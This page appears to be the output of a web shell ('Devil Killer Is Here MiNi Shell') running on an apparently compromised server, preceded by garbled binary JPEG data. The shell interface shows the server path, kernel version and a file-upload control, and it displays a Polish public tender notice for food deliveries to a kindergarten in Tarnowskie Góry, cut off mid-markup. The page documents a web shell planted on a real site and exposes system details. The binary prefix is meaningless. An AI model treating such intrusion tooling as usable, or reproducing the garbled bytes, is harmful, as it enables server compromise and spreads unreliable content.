JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210930/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210930/0019718902-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów spożywczych w 2022 r. na potrzeby Przedszkola nr 9 w Tarnowskich Górach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PRZEDSZKOLE NR 9 &quot;AKADEMIA PRZEDSZKOLAKA&quot;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 271509831</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Zaciszna 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tarnowskie Góry</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-606</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">p9tarngory@wp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">przedszkolenr9.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">ZESPÓŁ OBSŁUGI PLACÓWEK OŚWIATOWYCH</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">6452543334</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Wincentego Janasa 11</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Tarnowskie Góry</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">42-612</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">(32) 454 82 00 / (32) 454 82 01</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">przetargi@zopo.tarnowskiegory.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://bip.zopo.tarnowskiegory.nv.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów spożywczych w 2022 r. na potrzeby Przedszkola nr 9 w Tarnowskich Górach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b30b0b92-20f3-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00197189</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003328/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa artykułów spożywczych w 2022 roku na potrzeby Przedszkola nr 9 "Akademia Przedszkolaka" w Tarnowskich Górach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Z zastrzeżeniem postanowień zawartych w rozdziale XVI SWZ oraz w ust. 2 i w ust. 4 rozdziału XII SWZ, komunikacja między Pełnomocnikiem Zamawiającego a Wykonawcami może się odbywać wyłącznie przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz. 344), tj.:<br/>1) pocztą elektroniczną na adres e-mail: przetargi@zopo.tarnowskiegory.pl lub<br/>2) poprzez dedykowane formularze dostępne na miniPortalu i ePUAP.<br/>2. Ofertę składa się pod rygorem nieważności, zgodnie z wyborem Wykonawcy:<br/>1) w formie elektronicznej (oznacza to postać elektroniczną opatrzoną kwalifikowanym podpisem elektronicznym) lub<br/>2) w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym wyłącznie poprzez platformę miniPortal.<br/>3. Wykonawca, aby wziąć udział w elektronicznym postępowaniu o udzielenie zamówienia publicznego musi założyć konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji użytkownika miniPortalu.<br/>Więcej informacji zawiera rozdział XII i XIII SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>-	administratorem Pani/Pana danych osobowych jest: Dyrektor ZOPO, Adres: ul. Wincentego Janasa 11, 42-612 Tarnowskie Góry;<br/>-	Inspektor Ochrony Danych w ZOPO: Pan Adam Korzuch,<br/>-	Kontakt mailowy: korzuch@infoic.pl,<br/>-	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: „Sukcesywna dostawa artykułów spożywczych w 2022 r. na potrzeby Przedszkola nr 9 w Tarnowskich Górach”, nr postępowania ZOPO.2610.3.2021;<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>- Pani/Pana dane osobowe będą przechowywane przez okres, który wyznaczony zostanie przede wszystkim na podstawie rozporządzenia Prezesa Rady Ministrów w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie działania archiwów zakładowych, chyba że przepisy szczególne stanowią inaczej;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>•	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>•	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych(1);<br/>•	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych (2);<br/>•	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu:<br/>•	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>•	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>•	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">(1) wyjaśnienie: skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/><br/>(2) wyjaśnienie: zgodnie z art. 19 ust. 3 ustawy Pzp wystąpienie z zadaniem o którym mowa w art. 18 ust.1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZOPO.2610.3.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1 (pakiet I): Produkty mleczarskie:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 31947,95 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2 (pakiet II): Mięso świeże: wołowe, wieprzowe i cielęce, produkty mięsne, wędliny, drób:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 30067,95 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 (pakiet III): Warzywa i owoce:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 32751,46 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15300000-1 - Owoce, warzywa i podobne produkty</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z brakiem możliwości jednoznacznego określenia wielkości przedmiotu zamówienia pod względem ilościowym, Zamawiający zastrzega sobie posłużenie się prawem opcji, o którym mowa w art. 441 ust. 1 ustawy z dnia 11 września 2019 roku – Prawo zamówień publicznych (tj.Dz.U. z 2021, poz. 1129). W takim przypadku całkowita, gwarantowana ilość przedmiotu zamówienia określona dla poszczególnych asortymentów, zamówiona i dostarczona w ramach opcji nie może być mniejsza niż 15 % ilości określonej dla poszczególnych asortymentów w załączniku nr 2 do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-03 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryterium: Cena ofertowa (IP) – 100,00 pkt (waga kryterium wyrażona w<br/>punktach)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 (pakiet IV): Pieczywo, świeże wyroby piekarskie i ciastkarskie:<br/>Przedmiotem zamówienia jest zakup i sukcesywne dostawy na podstawie odrębnych zleceń jednostkowych artykułów żywnościowych do Przedszkola nr 9 w Tarnowskich Górach w terminie od dnia zawarcia umowy (jednak nie wcześniej niż od dnia 03.01.2022 r.) do 31.12.2022 r.<br/>Wykaz produktów wraz z ich planowanymi ilościami znajduje się w załączniku nr 2a który stanowi plik Excel składający się z odpowiedniej ilości arkuszy, z których każdy stanowi oddzielny pakiet (część zamówienia) – arkusze oznaczone są numerami od nr 2.1 do nr 2.6 adekwatnie do danego pakietu (załączniki nr 2.1 do 2.6 do SWZ). </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 11500,46 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03000000-1 - Produkty rolnictwa, hodowli, rybołówstwa, leśnictwa i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p 